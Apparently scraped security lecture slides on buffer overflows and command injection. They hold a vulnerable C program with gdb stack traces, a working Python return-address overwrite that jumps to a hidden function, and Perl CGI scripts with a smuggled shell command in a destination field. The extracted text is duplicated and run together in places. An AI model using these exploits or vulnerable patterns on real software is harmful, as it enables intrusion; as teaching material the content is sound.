busted !. why security systems fail capability list

Busted !

Why Security Systems Fail

Capability ListCapability List

Access Control List

Access Control List

00 00 00 00 00 00 00 00 00 00 00 00

name[9]name[9]

00 …

degree[4]degree[4]

‘c’‘c’ ‘h’‘h’ ‘a’‘a’ ‘r’‘r’ ‘l’‘l’ ‘e’‘e’ ‘s’‘s’ 00 ‘P’‘P’ ‘h’‘h’ ‘D’‘D’ 00

strcpy(name,”charles”);strcpy(name,”charles”);

00

strcpy(degree,”PhD”);strcpy(degree,”PhD”);

00

…00

printf(name);printf(name);

printf(degree);printf(degree);

charlescharles

PhDPhD

‘c’‘c’ ‘h’‘h’ ‘a’‘a’ ‘r’‘r’ ‘l’‘l’ ‘e’‘e’ ‘t’‘t’ ‘o’‘o’ 00

strcpy(name,”charleton”);strcpy(name,”charleton”);

‘n’‘n’

…00

00 00 00 00 00 00 00 00 00 00 00 00

name[9]name[9]

00 …

degree[4]degree[4]

00

‘c’‘c’ ‘h’‘h’ ‘a’‘a’ ‘r’‘r’ ‘l’‘l’ ‘e’‘e’ ‘t’‘t’ ‘o’‘o’ ‘P’‘P’ ‘h’‘h’ ‘D’‘D’ 00‘n’‘n’

strcpy(degree,”PhD”);strcpy(degree,”PhD”);

…00

00 00 00

printf(name);printf(name);

printf(degree);printf(degree);

charletonPhDcharletonPhD

PhDPhD

#include <stdio.h> #include <stdlib.h> #include <string.h> void secret1(void) { puts("You found the secret function No. 1!\n"); } int main () { char string[2]; puts("Input: "); scanf("%s", string); printf("You entered %s.\n", string); return 0; }

At startup of poof

0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq

rip 0x000100000e52rbp 0x7fff5fbff828rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


At startup of poof





Before call to puts()





Just inside of puts()

0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 (ONE INSTRUCTION IN/* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq

rip 0x000100000ea4rbp 0x7fff5fbff810rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Just after return from puts()





Just inside scanf( )

0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa (ONE INSTRUCTION IN) /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq

rip 0x000100000e66 rsi 0x7fff5fbff800rbp 0x7fff5fbff810rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

After return from scanf ( )


rip 0x000100000e7brbp 0x7fff5fbff810rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Just before stack cleanup





And ready to return to the operating system?


rip 0x000100000e96rbp 0x414141414141rsp 0x7fff5fbff818



?

0x0000000100000e40 <secret1+0>: push %rbp 0x0000000100000e41 <secret1+1>: mov %rsp,%rbp 0x0000000100000e44 <secret1+4>: lea 0x65(%rip),%rdi # 0x100000eb0 0x0000000100000e4b <secret1+11>: callq 0x100000ea4 <dyld_stub_puts> 0x0000000100000e50 <secret1+16>: leaveq 0x0000000100000e51 <secret1+17>: retq

rip 0x000100000e40rbp 0x414141414141rsp 0x7fff5fbff818



?

Hello secret1( ) !!!

$ poof Input: A You entered A. $ cat poop import struct rip = 0x0000000100000e40 print("A"*24 + struct.pack("<q", rip)) $ python poop | poof Input: You entered AAAAAAAAAAAAAAAAAAAAAAAA@^N. You found the secret function No. 1! Segmentation fault $

#!/usr/bin/perl# funky CGI script example$dest = "foo1"; # pretend this is the destination address from the useropen (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmailprint MAIL "To: $dest\nFrom: me\n\nHi there!\n";close MAIL;

!/usr/bin/perl# funky CGI script example$dest = "foo1; echo 'this could be bad!';find . -name '*.c' -print;";open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmailprint MAIL "To: $dest\nFrom: me\n\nHi there!\n";close MAIL;

/usr/bin/perl –w# (1) quit unless we have the correct number of command-line args$num_args = $#ARGV + 1;if ($num_args != 2) { print "\nUsage: name.pl email-address brief-message\n"; exit;}

# (2) we got two command line args, so assume it’s address$dest=$ARGV[0];$content=$ARGV[1];

my $sendmail = "/usr/sbin/sendmail -t";

#open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmailopen (MAIL,"|$sendmail") or die "Cannot open sendmail: $!";

print MAIL "To: $dest\n";print MAIL "From: me\n";print MAIL "Subject: test\n";print MAIL "Content-type: text/plain\n\n";print MAIL $content;close MAIL;

Run it with./tryit.pl ccpalmer “Some long message here inside quotes”

Could you find a way to trick the perl script into mailing you some file that it shouldn’t???

busted !. why security systems fail capability list

Documents

lea 0x10

lea 0x75

lea 0x6d

lea 0x5b

callq 0x100000e9e

callq 0x100000eaa

callq 0x100000ea4

int main